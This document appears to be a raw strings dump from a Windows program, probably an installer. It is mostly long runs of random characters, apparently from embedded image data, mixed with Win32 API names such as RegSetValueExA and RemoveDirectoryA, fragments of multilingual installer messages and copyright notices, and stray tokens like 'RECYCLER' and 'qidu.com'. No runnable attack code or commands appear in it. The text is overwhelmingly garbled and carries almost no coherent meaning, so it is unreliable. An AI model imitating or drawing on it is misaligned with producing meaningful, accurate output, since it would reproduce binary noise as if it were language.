PLyIE}MI
P*	`/	m4
p_maK]xdqgS`S?KXCL[FN`IQ]FKM79F/3[EG`JL<%)H15M6:S>AM8;7"!6
pMF>7wf]
pmiVSbOL_LG\JC`MFlVPn[ThVO_MFcQJlYRq^WYG@l\V
p_m^K\werhTaU>LXCL]FN`IQ]FKL68F/3[EG`IM=&*H15L59R=@L7:8"$6
^P~]M}\L
pmo\UoYNwZK}ZF
_P|^M{^P|_P~]M
pmr_\{has`QweZkZQsaZ
pmr_\|ibs`QweZkZQsaZ
_P~]M{]R|_P~]N
pmr\WcOJbNInYW
pmxlhtienc_mb^pf_qib
pmymitieod`kb^nf_qib
pmzkhthdod`nd]ukdwpgwqf{uj
P<n;'{K9
pn}oiyketdedRYN=F<.20((81.[TQzsp
PNT<78_\X
PN}UWsTc@*CB3SD5TD5UE6VA7UA9XE=\MGjIHhT]xUcv?KUN\[T`bS^fK[aQWd^aoqr
pny krok
Podaj miejsce gdzie b
%P &O"$L 
Pomoc...
/;>P[\o|n
P[o?P]/LQ4MW4NU1JN3HI-B@,@A)>?(=?*=@'=B&<A)<C(:A-=D*:@,;=-;:)68)68(46&24*36(14(46+79)57&24'35&24'35'35(46(46'35&24'35(46,58,58,5807:#,/%*+&.."/-",,$..#//&22)590NST
Poprzedni krok
POS<78_\X
PostMessageA
PostQuitMessage
pour le management et le proc
P[{OY{do
P@"PC!M@
pppyyy
P^pUbrXeubl}alzhq
pp'|~$v{
PQ_($0)$-/&)A42H7.E0.E08D1:D6<E;AIAHKCMSMXZVb^[jeatkgzrn
PQ_($0)$-/'(A42H8,E0.E08D1:D6<E;AIBIKCMRLWZVb^[jeatlh{rn
P[qAIZ?FOAHKKSRMVSy
]p}[q}an~[dq]isS`pNXbGQ[KV^COUGSY=HP09B/8A09=0:A/9@3<?3<?6?B8>C;ELA]hf
PQf1,A
P[q@HY?FOAHKKSRMVSw
%P &Q!#L 
]p}[q}`m}[dq]isU_pOYcGQ[KV^COUHTZ=HP09B09B09=0:A/9@3<?3<?6?B8>C;ELB^if
P^qO^qQ]uNZrKWoLYsSaxUb|Ud~Ug~Uj
PQWh`IA
pR]@2fF9pG>{K?{@1x=.|?5
pR]@2fF9pH<zJ>{@1x=.{@6
pR]?4fF9pH<zJ>{@1x=.{@6
 precisa no m
Previous step
pRfF9pH<zJ>{@1x=.{@6
{{^PrOA{XJ
product_model
ProductModel
ProductType
Program: 
Programa de aplica
Programgroup
Program group
Programmgruppe
<program name unknown>
 proprement dans votre disque dur.
 protegido pelos tratados internacionais.
prrlqphmly}~
prrrrrvtsuqprlmwrqupotporpoqonsqqiklrwz
prrrrrwutuqptllwrqupotporpoqonsqqiklrwz
pRydH{bH6
Przegl
Przewodnik u
Przeznaczenie
PSa''3-'(E0(
P]sJXoYgyamyUciK^aMbcPa^S\Y^aXmdZ}iX
P]sJXoYgy_myUciK^aLabO`]R[X^aXmdZ}iX
ps|RMh=4
pswlpqklplikmlnqprprsptuqtx
p]tf`oacqkn
ptyfokamd]jd[eg\dvfm
PTYgjr
ptygklprrcfd^\[k\Z
PTYgkp
ptyhimX[_KKKLHGDBAA<;=89977977:23356;.03./4)+0()*('+($/)$,+'-,(.,+:('
ptyhimX[_OJKIGFFBAB=<<78;67;67:23746;-/2,-1))0&&0'$+'",)!0*#/,$-*&7*(
P^uM[rGUlDRiM[qFTjJXo^l
P^uM[rGUlDRiM[rGUlJXo]j
- pure virtual function call
]PuXJ}[N
!P$)V9=Y:@S
PV{IOtJPuPTwRWxNUvIPqLRuIOtFLoLRuBIpCJqNU|QX
PV{IOtJPuPTwSXyPUvIPqLRuGPrDMoLRuAJpBKqNU|PW~SZ
PV]JMUJLV
PV{KSxJRwCLnEMrMT{OV}TZ
pv{ksz|
pVKwOf
PVmKUf4I^$=e/<t77[("
PVmKVd4J\$=e0=u77[%!
PV{NW}O\
PV{OX~O\
pvqdnhftpp}{nxxmxv_kkertbnr^gjU\_07:1:=CJMlux
pvqdnhftpp}{nxxmxv_kkertboq^gjU\_07:2;>CJMovy
PVy<Cj-6a
]PvYJ}[N
PVyKQtIOrPV{U[
PVyKQtJPsQW|U[
PVyQWzNUvDKlGMpHPuHOvGPvCLrGPvKTyLU{S\
P[w6Da/<\)4T,7W/=Z3>\6A_1<Z/:X7Eb5C`9Db4?]+6T6Bd=Fl?FmEJqY\
P[wGMjIOlmo
P]wKVtQ_{_o
P]wKVtR`|^n
`pwL^eIZcJ[dO]iQ_kUbpVgtSfsPfrQfucq}ny
PWr6A]-9U,9S'3O-9U1?[1?[6A_3>\3?[7C_5?]8B`4?]3>^?Hm@In;Fl:Fj0=cAQvXc
pwvZgiO]tWfoS`qV`
pwxjpm_evaj
pwzptupppolnojkqoopnnsprtsuqpr
P\xL]xF[vI^yEZuEYrJZqes
P\xTb~^p
PXuFRnGWtTe
PXWRZYYa`]bakkk
pxxhtvq
pxxhtvr
pxxputnppolnojkqooqootqstsuqpr
P+#Y5/U50\=:Z?;R50K.*Q40Q54U99Y==lMN
}pybZt_^iNWQ7D?*3@+->)+=+*=+*<)&7$!:'$B/,C0-B.-=+*;*':'$<&!<(#B/*1" 6$#=,)I/(K-"cB3
PydKw`Hv_Jv_Jo[HlVJkVGhSIgTFfUFgXAcX@cY?cW@dXBdY<bP;aO6[K.RD"=43;;
P_yGVpJXtTe
py{jnxgpmamaVfKHW>?IB;B=2:91;=5@@5=B9C:6B:3@>7D=4A80::+3:.4B9<F=@=9?79C<@KACNEBKB;BH=GJ@LKBLFBNE@ODCLIFUJDUL@RH>KLBOLAQO9K[FU[CU[EX`G[aPehWlaLeTGapi
{~p[YlJD
P[yQ`zXf|l{
P[yQ`zYg}kz
_PyXHzXHzSE{OB
]PyXIzWI
P/=yZg
pyzimyhqmamaVfKHW>?IB;B=2:91;>6A@5=B9C95A:3@@7D=4A:1;;,4:.4C:=F=@>:@79C;?JAAMDAJB;BH=GIALKBLDBNFAPEDMJGVJDULAQH>KLBOMBRP:LZET[CU[EX`G[aPejWlaLeTGapi
=pz4eo@q{8nu0jp:qz1kw2kz2hy0du1_q-Wj4\n6^p3Xf.R\*MZ,P`(O^
P+#Z60U41\=<\?;R51L/+Q40R43U99\=>mNO
Pz9WD<hRG
PzcKw`Hv_Jv_Ip[HlVJkVFgRIfVFfUFgX@dX>cY=cW@dXBdY:bP;aO5ZJ.RD"=43;;
PzcKw`Hv_Jv_Jo[HlVJkVGhSIgTFfUFgXAcX@cY?cW@dXBdY<bP;aO6[K.RD"=43;;
P;Z;d;n;x;
P;zH4qC2
P;zK6wG5
"?P]Zo
\Pz]Tkd[D
PZx6Da/<\'4T*7W.;[3>\4B_.<Y-;X6Da7B`9Db4?]+6T6Bd=Fl?FmEJqY\
Q;0dJ>sVH
-Q>1aG9vYJ
Q@|?1~=/|E8yH>kD<b>6^>1dD9nG>zM@{B3zA2
=Q>1^I:uYH
$Q>1`I:uYH
@Q>1`J>~cU
'Q!2]$4_"4]
'Q!2]#4_"4]
Q2`8,wXY
Q2`8,xYZ
Q2)Y2)l=5
>Q@3^I:oUE
Q3(K:1( 
Q?4^H<oUE
Q4`\IYaPXaTQ^NN[KN[MN[MQ[JV[F\[GVYCRU;RQ<GRBCTGEXIK\NR`NW_HVZASY@QS?JA3=,#>#
Q4`\IYaPXaTQ^NO]KN[MN[MQ[JUZE\[GVYCRU;QS=HSCDUHEXIK\NR`NW_HVZATZAQS?JA3>+#>#
+@$;Q4Ld5Og5Me.E[0E[5F`'8R
Q4YaPXaTQ^NO]KN[MN[MQ[JUZE\[GVYCVYCRU;QS=HSCDUHEXIK\NR`NW_HVZATZAQS?JA3>+#>#
q ;~'5
Q6R5,iRV~bh
?.Q6(T7(Y8(X9*bG9mZM|_Q
Q@7eLB
Q@7[G<rXJ
=Q@7\H=qWI
Q@7\H=qWI
<q~7q};r
<q~7q}>s
Q@7X4,kMByRD
Q>9cMB~cU
Q9wG5m@2
q$A3<.
<QA5]J=rXJ
[qa7bR-mR&
QAeD0S:*P:.WA5_G;bJ>nTHw\N
qa{PAsG6pVHi
qaueT|kX
Qb$[j$[j#Zi$Xh!Ue
Qb$[j$[j#Zi$Xh"Vc
Qb}K]zFSs
QbuDUhGXmBTkHYsP_yQ_{Vd
QbuEViHYnBTkHYsM^yQ_{Vd
QbwWizP`pAR_Ykveu
QbwYizO_oBS`Xjudt
{qbZS+'"
Q]c#/50=E?PYCV^
Q;|C-k7 [*
Q;|C-k7 \*
QCr7-l6/q:5q<2m:0q=6zF@o;5i2-f/*o64zEH
QCr7-m70q:5r=3m:0q>4xF@o;5g3-e.)o64zEH
QctN^oJYlN]pK\oSasPduK]nTZeRRXILPJORHQTBHMEIN9AH<BM4=F2<C5:C1=C.:@3?E/;A6BH4@D1<@1<@0;?1<@1=?/<>0<>2>@/;=0<>.:<09<09<18;18;/8;.:<1=?+33)25-47/99/995:;2;>3A@;NUNu}
QC=YOHgZR
??QDEYX\t`f}ak
 ;?QDHZSVkSXmcj~[f|M[rXi
qdtfSf
qeasaZpZT
qee|pv
~q~|erps
QEu>1}@2
QEvK<{I7yG0
QevZhzVcsN[iXhuHVbGQ[RX]dge|{w
Qf{"9S
qfbp]Vl]Tr_X}je
qfbp\Wk\Sr_X}je
}q}feuY`tVa|Sa}M^yJ[vHYtDYuGWtMXs\\nuio
qf{h[n[NgSHl[R
qf{h[nZOgRJl[R
Qf{NbtO`uUe|QdySk
qfqaUwUE}T>zS=zP={R<{T>yQ>{Q>{Q>zP=zP=yO<xN;xN;wM:wO<vN;xP=zR?|TA}UB{S@yQ>wO<xP={S@|TA|TA{S@yQ>wO<yO<yO<yO<xN;wM:wM:vL9vL9wN8wN8vM7vM7uL6uL6uL6tK5uK8uK8uK8uK8vL9vL9wM:wM:yQ>zR?zR?yQ>yQ>zR?zR?yQ>|R?zP={Q>zP={Q>|R?yO<wM:xP=wO<wO<xP=zR?{S@{S@zR?{Q>zP=yO<vL9uK8uK8uK8tJ7uK8tJ7tJ7uK8xN;{Q>|R?wO<yO<yO<yO<xN;wM:wM:vL9vL9wN8wN8vM7vM7uL6uL6uL6tK5uK8uK8uK8uK8vL9vL9wM:wM:yQ>zR?zR?yQ>yQ>zR?zR?yQ>|R?zP={Q>zP={Q>|R?yO<wM:xP=wO<wO<xP=zR?{S@{S@zR?{Q>zP=yO<vL9uK8uK8uK8tJ7uK8tJ7tJ7uK8xN;{Q>|R?zR?yQ>yQ>yQ>yQ>yQ>xP=xP=xP=xN;vN;vN;xP={S@|TA}UB}UBzR?{S@}UB~VC~VC{S@xP=wO<wM:wM:wM:wM:xN;xN;yO<yO<yQ>zR?{S@{S@{S@{S@zR?yQ>yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<xN;xN;wM:wM:wM:vL9vL9wM:vL9uK8tJ7tJ7uK8vL9wM:wM:xN;xN;xN;yO<yO<xN;wM:wM:wM:vL9vL9wM:vL9uK8tJ7tJ7uK8vL9wM:wM:xN;xN;xN;yO<yO<xN;yO<yQ>yQ>yQ>yQ>yQ>yQ>yQ>yQ>yO<yO<yO<yO<yO<yO<yO<yO<wM:wM:xN;vN;xP=zR?|TA}UB
qfqaUwUE}T>zS=zP={R<{T>yQ>{Q>{Q>zP=zP=yO<xN;xN;wM:wO<vN;xP=zR?|TA}UB{S@yQ>wO<xP={S@|TA|TA{S@yQ>wO<yO<yO<yO<xN;wM:wM:vL9vL9wN8wN8vM7vM7uL6uL6uL6tK5uK8uK8uK8uK8vL9vL9wM:wM:yQ>zR?zR?yQ>yQ>zR?zR?yQ>|R?zP={Q>zP={Q>|R?yO<wM:xP=wO<wO<xP=zR?{S@{S@zR?{Q>zP=yO<vL9uK8uK8uK8tJ7uK8tJ7tJ7uK8xN;{Q>|R?zR?yQ>yQ>yQ>yQ>yQ>xP=xP=xP=xN;vN;vN;xP={S@|TA}UB}UBzR?{S@}UB~VC~VC{S@xP=wO<wM:wM:wM:wM:xN;xN;yO<yO<yQ>zR?{S@{S@{S@{S@zR?yQ>yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<yO<xN;xN;wM:wM:wM:vL9vL9wM:vL9uK8tJ7tJ7uK8vL9wM:wM:xN;xN;xN;yO<yO<xN;yO<yQ>yQ>yQ>yQ>yQ>yQ>yQ>yQ>yO<yO<yO<yO<yO<yO<yO<yO<wM:wM:xN;vN;xP=zR?|TA}UB
Qf{#:T
qg~hd}gg
]QGL,&Q5.^>8^D=T<0^B7fL>rXLy_S
QGMQGM0 
qg#yo,
=.qH2rM9yM<xL;{K9|J6yJ4
Q<~H7tB0uA1
qhfNBoRC}\M
{q~hhz[czYd
{q~hhz\d{Xe
{q~hhz\d{Yd
Qhpe?3zH6
qhu|p|~nudZZ
qhu|p|~nufZZ
qhve\j]Oi]SeXPh]UbZS1-(# 
@QH	ZJ
qidu.com
{q~ii{[czYd
)%$+'&-)(-)()$#-%%QIInddi[\aST[MN`SQeXVVJH2&$#
)%$+'&-)(-)()$#,$$QIInddi[\aST\NO`SQeXVVJH3'%$
|qi^NGWJBXNGPJEJGCHFEGD@EB=AA;??9;<878404/261-20.31&+)+0.*/-&,'"& ! 
|qi^NGWJBXNGQKFJGCHFEGCBEB>AA;??9;<878423/150-20.31%,)*/-).,%,'"& 
qj|ge|fh
qjjOEiMBbD9eB5|D9
qjjOEkLCbA8dA7
qjvdexce}hk
qjwbdydf}hk
qjwd_xe`r_Zud[r`Yyg`lYR
qjwd_xe`r_Zve\r`Yyg`lYR
qjxv9N
QJyMF|KCxG?yC<yD:{NA
QJyMF|KCxG?yC<yD:zM@
qjzgdeTQ`PIdQJtb[
QKL>:5
]QKN:5E2*?'!A*"H("P6/U?3bE7}cS
|q~k\sbUr
qks]Wb
Q@[kXm
qkzlfthboe^nd]ukdvofvpe{uj
QKzLKxLKwOPtOSvTUtRSvSWwPRvKNzQO
%/QL[{
qLfh\eeYoh_qh^}j]
`||qlk{cc
q_l^KZo[hw`n\FRT?H\EMYBJ`JOM8:K35]EGhPPA+-=&*I26H36H36<'%5
qls]Wt]Us\T}e_
qls]Wt]Us[U|d^
qlVJbJD`JDXG>RD>NEBHA>DA9A=<>:9=;:364053.32*0/&+,#,)'.)%-&#,"$'
qlVJbKC`JDYF>RE=OFCHA>EA<A=<>:9=;:564253.32*0/&+,$-*'.)%-&#,""'
Q@[lXk
qlyjgxcbxe`}jc
Q=m:&}K9
q^m_L[r[iw`n\FRU@I[FNWBJ`JOM8:K35]EEhPPA+-=&*J37I38H36<'%6
qmrojltknicdfff}z|
QMXSR[xw{tpuNHMRIF
QMXSR[xw{tpuOINRIF
QMzLKxLKwOPtOQvTUtRSvSWwPRwLOzQO
Q^n0=M3@P.;K+9Kaq
Q^n0=M3@P,:L+9Kaq
q}ndta[lWVfNN^FHSHDPJHTBESFMa?I[;EW>HY>FW<CR5:I7:I;AN9=O8<O48J3;L3?Q4;N46HBAUQSeNUhITjEQi5CY8FY;H^>K[<FX=DXCKb@Ka@KaAJ^<CWBG\GMdCMeCLg?FaHLhLQjMSjNSlKRmPSrY\{km
*qn feZ
qn{he}li
Q?nP?bH<_H9`F8}bTxaRy_S{[UyYSvRLzYP
qnyjh|pfxhixfg
qnymg{oivgdq_^p^]lYV
qnzhg|ogyijyfi
qnzkh{oivgdq_^p^]lYV
Q]]NZ\NZZWcc_mkftpt
Q]]NZ\NZZWcc`nlftpt
^Q~\O|bQx^NzaQ|aS
qo|ji}jg
/;?Q\\o|n
Q^~O[wP\xVbzXe{^l
Q=<oWY
Q*"P)!N)!V1)W2*T.)V0+W2*P,&V2,]93X4.R-%R-%R+"R/%V2*W3-_:6pIG
Q*"P(#N(#W1,W1,T.)U1+W2*R,'W1,]93X4.R-%R-%P,"R/%V2*W3-_:6pIG
Q^~P\xR]yWc{Xe{]k
Q=<pXZ
Q+}Q4{UCsWLfL>YA5YA5jPDzYJvJ9w?,uA*
QQa33?AAMJIYUWi`cqnm
Q]qBK~KI
QQQ3;4
QQQQQQQ
Q)$Q+&T.)V2,R.(R.(T1-S0,O,(W2.[62P*&H"
Q*"Q+&T.)V2,R-)R-)V1-S0,P-)U2.[62O*&G!
`Q}`Qw[JxZIxVFyRC
Q@r25m,<z.H
>Qr8Lk@Ts>RqVk
Q]rCL~JJ
qR|dHwaE>
QRich`
Q@RjzV
Qrk@3+C4+B8.F60O?8bVJeTKlYQ
Q_rO_pS^tNZrKVqKXrS`zUb|Ud~Uf
QRtRSmUVkWYqVWsXZrWYqVYnQZn>Nk&=k"4q/5d&".#
QRtRSmUVkYYqVWsWYqVXpVYnQZn>Nk&=k#5r06e&".$ 
Q[sFQl]e
Q`sJYlTbxPavVf}Wf
Q"sKLsMMpLLnJJrLJpMJmLImGGfDE`@A`@A`AD\=@]<@\8>[5;U48T37Q04P-1P+/O*.J*+L-.M/.N0/R23Z89^<=e@DlGKtKRwSS
Q`sKZmTbxPavVf}Wf
qssput
^qsUpdHrT;yM5{H.
`Qs^VmZWfTScQR]NLcTRlZYv]Y
qSydH{bH5
_qs`YHEVC>^LMfYWmaWueY
qtjY\oabnbbsei
qtkZ]oabobdsei
QT\MPXKQ\MS^PT_TV`VX`QS[PS[LT[LX^O_eMQ\?FO6@G1;B0<B1=C3=D/;A.:@-9=.:>.:>/;?0<@4AC/<>-:<+8:-:<-:</;?.;=0<>1=?.7:-6918;29<2::/9907:18;18;29<3:=29<3;;2:93;:4<;088/995??:LSOu
qtx@BBCDB
 quer continuar?
 quer instalar o perif
Questo software e protetto dalle Leggi internazionali per i diritti d'autore.
 que vous voulez pour ce programme
`]qUNcrFC
quv@BBCDB
Q_uVdzJYi'7C5IN;TXC\`QejScjZir]fsW_lcluiiozpp
quyfoj`ld]jd[eg\dvfm
QV}07^/6a2<l5?o6Am4Ao3>p7Aq8Dt;Eu<Ew;Dv;Fz@J
"Q$)V9=Y<@S
|q^VeNFaF<fGDaD;^>3[;0\<1^;1cD;dME_E>rRL{PG
QV}=Fh2>`:EeJQl`cx|y
[qvLdbQb^[c\RPEF?0r]H
Q"vNOsKLsMMpLLnJJrLJpMJmLImGGfDE`@A`AD\=@]<@\8>[5;U48T37Q04P-1P+/O*.J*+L-.M/.N0/R23Z89^<=e@DlGKtKRwSS
Q"vNPrKMsLNrLLnJJpMJpMJnKHjFFfDD`@A_@C\=@]<@\8>\6<U48S26Q04P-1P+/O*.K+,L-.N/0O/0R23Y78_:<e@DnFKtLQwSS
qvqKItE=
Qv\Ty_Qx^Ow^Is\EnYGkZJiZEeTCeTCdU=_T<^S;_O?aP?aP<]N<[L5TE.O@%:1(-+nac
qv|USuLC|KCyICmGGrWZ
QVwDGfNSr5:[)+I
^QvYK}[N
QvzMpzJnxCjs2Ya<ck=gn8`e8^c/UZ*PT)RU0V[=\eZu
qw|\cfhnspuxz
^:(qWGydU_PG,"
^:(qWGydU_QE,"
QWh`IA
;qxCw~Kz
Q:xI3vE5
Q^xJYsDSm8E_CNi\e
Q^xKZtDSm8E_BOiZe
Q\xTb~`p
Q[yIRmHQeCLZ=FP:AJ7>G38A26Adgo
Q[yIRmHQeCLZ=FP:AJ7>G49B27@ein
Q]yN\xF[vG^xEZuEYrJZqes
Q/&Y@;r=:r@9r?5j2/]3.[0-Z.+Y2,[2,[/+\30a85g??oBAs>?q;<n:<r>>tA?zFD
qY}]RtWIrUGqVL
qY}]RuWLrUGqVL
QYv8Fc.>[*:W(6S+9V0>Z3?[6A]0;Y7B`7Eb7B`:Db0>[7Bb>Fk?En?Go>GmIRwjr
QYwGRnGWtTd
q- z5+~:3
qz}dnVNOOJLTOQ]VYjbi
Qz<G<.PE=[QJYSNdXRm`Xui_
q\ZjJD
[QzLDM,#2
Q\zMXsP]wWe
Q\zMXsP\xWe
Q\zOb}Pb
!@Q^Zp
qz~qtxnoslmqjikmlnpoqprsptuquv
qzral[JUE3@=+<9/@HEUi`j~pv
=qZ[sK
'R"0`(9l0At7L
R0&[?<s=:r@9r>4i2/]3.[2-Z1+Z2,[2,[/+\41c84h?>pB@t>?q;<o9;q>=uA?zDE
`."r>1
R1`6*vUY
@R?2`F8vYJ
&R?2`K<w[J
R2X4*rTY
R2X5(rTY
R3\5&}WU
R3\5&|YV
"R$+\3>p<I}9G|5Ez,=p(8g=Lzeq
-R 3T"6U!3R%5R/=YKZtm{
R3V5,lTV~cg
R3W6-lTV~cg
(R"3Z"2W
$-& !R5'
r.!{6,~:3
R6)_B7o:4m:4mC9n<0d2,[3.[/,Y1,Y2-Z2-Z2/\63a85g>;m==m;;k78j9:l=<tA@xEF~RP
-R'7\#8X':[(;\&7X,>])9V,:VN\xWd~JXoN[qWdz[i|do
-R'7\$9Y':[(;\&7X-?^*:W,:VM[wWd~KYpM[qWdz[i|do
,R$8[$<`$=_&<_*?_+?^/A^0A\0>Z5@\1=Y2>Z:GaDPhFRjGTjJVnQ\pVau]i{gv
R8,HT@<rT4
:R^8MUI\a
-R$8[&:](<_&:])<],=^-?^,<Y/=Z2>Z0>[8Fc=KhAMiHUoKWoHTlM]tZh~Vdwao
,R%9\$<`$=_&=]*?^+?^/A^/@[1?[4?[2>Z2>Z:GaDPhGSkGTjIUmP[qTbu[i{gv
\Ra7207
ra|\E|U9
R\~AMo
rationnelle
RAzQBsPBnNArOBvNB
RB6X4,kN@yRD
Rbiavx
r Bildmanagement und -verarbeitung
R^bM\_`lpnwzy
rbueT}iW
|rbZS+'"
Rc~FWr^n
Rc~FWr\n
rci{n	
rc~k\tl[\
Rc}N_yM^xYm
Rc~N_yM^xZk
Rc~O`{^l
Rc~Pa|^l
Rc~Qb}]i
rc~qczh]
Rc~Sa}^j
RC:UD7aL=v\L
RcxL]pXgzap
 `.rdat[
.rdata
RD}L<zI9
r{}dnVNOOJLTOQ]VYjbi
RD>QA;cQJzfa
RD>QA:dQJzfa
Rd{QczXi~We|M]tSdyVexJYlL]pRbrBR^6OS6QU9UV<SU0CF:JPMZbO\d[gmadhvmj
Rd{SczXi~Vd{M^sUcyVexJXnN]pRbrBR^7PT7RV:VW=TV/BE:JPMZbQ\d[gmadhvmj
RDsL>nA3pE4xF4r?+vD0uC1rC5oB5oH:xL?
RDsL>nA3pE4xF4r?+wE1uC1rC5oC6oH:xL?
RduN^oJYlN]pK\oSasRduK]nTZeRRXHMPJORHQTBHMEHP9AH<BM4>E2=A5:C1<D.9A4?G/;A6BH3?E1<@0;?0;?/;?/<>/<>/<>2>@/;=0<>.:<09<09<18;18;/8;-9;0<>+33)25+47/99/995:;2;>3A@;NUOv~
RduYh{jx
RDW=6R=5T?7YD<aK@lQGyXO
RDyJ<wD4|F5
RDzK=wD4|F5
ReadFile
Readme
\readme.txt
R]eanvct}Vfmhqt
RECYCLER
R<e.!f0
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
Remote
RemoveDirectoryA
R]e`mudu~Vfmhqt
Reprodu
Reproduccion de este software y todo su contenido estan prohibido.
Reproduction de ce software et son document est.
Reproduction of this software and its document is prohibited.
Reproduktion dieses Programms und seines Dokuments ist verboten.
rer le disque#
REtM?oM@~TH
R>{F1p<+sG6
R>{F1p=)uG6
rf|j_veXxeXvcVvcVxeXyh[zi\}k`
RfwZhzVcsN[iXhuHVbFPZRX]dge|{w
RfxH[pL^uK_xK_xOb}Ob}Rc}Pa{O^xYg
RfxI\qL^uK_xL`yOb}Ob}Rc~Pa{O]yXf
R>~G2p=)uG6
rgiD:@LELusyUSY/-3JFLxs|IDM*'0[Z^omm945,%*f[ci_k+",0).oghaZ_-%,<0.
rgiE;ALELusyTRX/-3JFLxs|HCL*(.[Z^oln945+$)g\dj`l*!+0).oghaZ_-%,<0.
(RGO|qtF8<2$*cT\seq6&13%+obdmci1&.8*+
Rg|PatQ_uUe|QdySk
rg/~s?
.!rH1qO8yO<xN;}M;wJ5xL5
=Rh+BQ+=H+7A+<?.=@+9?*8>)7=)7=(48(46(57(57-9;+79(46)68*87.::,8:'35(14+47+4709<+79(46+47)25+47+47+47+47+47*36(46'35)57)55*44+55-77/77(22)11*44*44-55/<><W[a
=Rh+BQ+=H,8B+;A.=@*8>*8>)7=(6<(48'35)68(57-9;,8:)57)68*87.::,8:'35(14+47+4709<+79(46+55)33+47+47+47+47+55*44*36'35)57)55*44+55,66/77'11)11*44+55,44/<><XYa
rh}dZ~cY
R<h."f0
R@}H;x?6q=6q?9rF?vVQwRNqGBrHCySOoZXk^\k__n^_sfd}je
R>~I5w@1x<0
rico driver
R~IDu7
ri|ge{fh
]RI@NG>\PJbXQf]Sm]V}lc
r Installation
r Installation.
rio de destina
rio onde queiras manter este programa.
rios...
rios de pc-c
rios para o disco r
r`_iWVgVSlYVub_xe`tb[k[ThXRgWPl^RlaS
R@~I<y@7q=6q?9rF?vVQwRNqGBrHCySOp[Yk]^j^^n^_sfd{ke
_rju@_fd
R]}JWqHUk?L\?IS=EL;AH9;E]bk
R]}JWqHUk?L\?IS=EL;AH9;E^fm
rkh1,-
rkhN=:T73X90T3*T4)R5,+ES)FU2P[>[`SmgVreSmgF`f7Q]1KW,IW-MX5Tc2Sb5Ra4M]2LZ-CN*=D+>C);F*<G)=H)=H'=H'?K&>J$>J&<G&58$02%32$21%13)57*53*44,58,58,5806;15:58<:;?8;?3;;1><0A>,>=-AB.AF*<C*8>)8;,9;+79.:</;=4@B1?>-9;*68,8:-69*361;;3;;3;:8@@8@?<BA=ABBFGCHF?DB=BA@ECDIGFKIDMJCPNITRQRPWLH
|rkkVNdD9^D6fKAqUNpYQlYLnO@sF9vF:
|rkkVNdD9`E7hMCpVOnYQlYLpNAsF9vE;
{r{k_r`Um[PqbY
{r{k_saVm[PqbY
RkuVfsI[fRdo.DP:T`Tp{DahNkp6NT)EF/MN<XY<UYCW\j~
rkV<6X>8U=7Y<3`B7cE:dC:fC6jF<qPGbF;eE8wSK}J@
rkxhaqaUrbVueY}k`
rkxhar`UrbVueY}k`
rlgVS`OL]MG\ID`NGjWPm[ThVO_MFcQJlYRp]VVF?l\V
RLs0(Q
rltZStUL
R=|M8uE3
r`ml[hhWdVK[LFWHBSLK[FLYCGY@ETBBRFFVCFUAHW9AR=EV@HY=DW=AT7:I58G9=P8>Q9=O66H99I@@PMM_EFZ<@S@FYEKbAHYCJ[?CU@GXEM^DN`@K_>I]GK]LPcKNcLPhFLcEJcLQjLQjPNkQLiSKi_Vqpj
r`ml[hhWdVLYLGVHBSKJZFLYDIX@ETCCSFFVBET@GV9AR<DU@HY=DW=AT7:I58G8<O:>Q9=O66H::J@@PNN`EFZ<@SAF[FMa@GVCJY?DS@GXEM^DN`@K_>I_GK]KObKObMRgFLcFLcLQjKPiPOiQLgSLg_Vqqk
(!'RMQpmp|y||y|b]a@:>
:R^:MTI\a
~rnn_\fURdSPdQLiVSm]WmZUjZTdWOeXPeXPxof
~rnn_\fURdSPdQLiVSm]WmZUlYTfVOdWOeXPxof
RN|OKzMJxKHtGDpC?m@<f:9sJO~YaoMWzXbnNYjLY|\g~^inLVU39S12L*+`>>fEBW63L+(N,,N-*V2,R+#H
RnuPmrOlqSpuA^c-GNg~
RN}UWtUd@*CA4TD5TD5UD5UA6V@:YE=\MGjIHhT]xWbv>JTNZZUacR]eK[aQWd^aoqq
r{~NUXBJJ>FE;CB6?<Yb_y
 <r%"O9
-<RoA%'_h7
\R~\O|bRx^NzaQ}bT
ro de fiche 
R]OIYJHYJGaONhSUhSQ~bh
ron]Zwd_q^Yr_Zq^Yyg`qaUyf^tb[tb[
ron]Zwd_q^Ys`[q^Yyg`rbVwf]tb[ub[
r~~o}qdtkZgo^imYemWclS]kMXlN[lN[nQ`qWgoXgv`rtbsvdu|ix
rPA_ZC`]C`]C__LdbHa]RfaHb\Lc[F]XC]W@]TFcZC_Y@_X:SO:LK0CF:IL=OP5JK8MK9PR9NO<RW;WXF`fFdi@`eG__M`]Pa]Qb_Mb`ShiRadNadP[_XbbWb`fpjgmlkpnz}{rxwuzy}
rPA_ZC`]C`]C__LdbHa]RfaHb\Lc[F]XC]W@]THcZC_Y@_X:SO:LK1DG:IL=OP6KL8MK9PR9NO<RW<XYF`fFdi@`eF^^M`]Pa]Qb_NcaShiRadPadP[_WaaWb`fpjgmlkpny~|rxwuzy
@R"Pb!Se$Ym0ey1fz0fw2ix0gv0gv2eu.aqL~
@R"Pb!Se$Ym0ey1fz0fw2ix0gv2fv2eu.aqL
RPf4-B
rpfMKhKGjMIdEB_@=aC>eHCY@<Z=8gF=iGAjD?vE7
rpomkj}yx
rPUC8[RI
rpwYNc8)~F3
rP;^Z;aa@ec?gf>egAdg=ccBdc>a]?a[=\U6YO9YT5XT1XV5ST1MN7HK,CE2HF.FF3KK2JJ1JN:QS.QT8WZ9\`5U[>\]>SQ@US;SS;WXG]b?QX?KOR]aLUXGRPS]]KUUMWWV^]cjmahkbjjmtwfpjjpk
rP;^Z:``@ec?gf>egAdg=ccBdc>a]?a[=\U6YO9YT5XT1XV5ST1MN7HK,CE3HF.FF3KK1II1JN:QS.QT9X[9\`6V\>\]>SQ@US;SS;WXH^c@RY@LPT]aMTWGRPT^^KUUMWWU]\cjmahkbjjmtwfpjjpk
rpzki}jg
rpzmkofcha^_XU
RPzWTtHDO2=-0? 5>#8?$3?#3B#4A'3F-9B.5.%aKM
=Rq8LkAUt>RqVk
R@|QBwRDyVH{XK}ZP}ZP
RQH?NG>\PLbWOf]Pm]W~nb
rq{lkt{{
RQ}LN~KO
r`}q\ur_zm\wj\xd]x^WrcXriXsiVoi[wkZ{nYylYnfWeupy
RQyXVtHDO3>.0>"5>#8?$3?#4C$5B(3F-9B.5.%aKM
|}]RrOA{XJ
&&&;;;RRRbbbkkkuuu
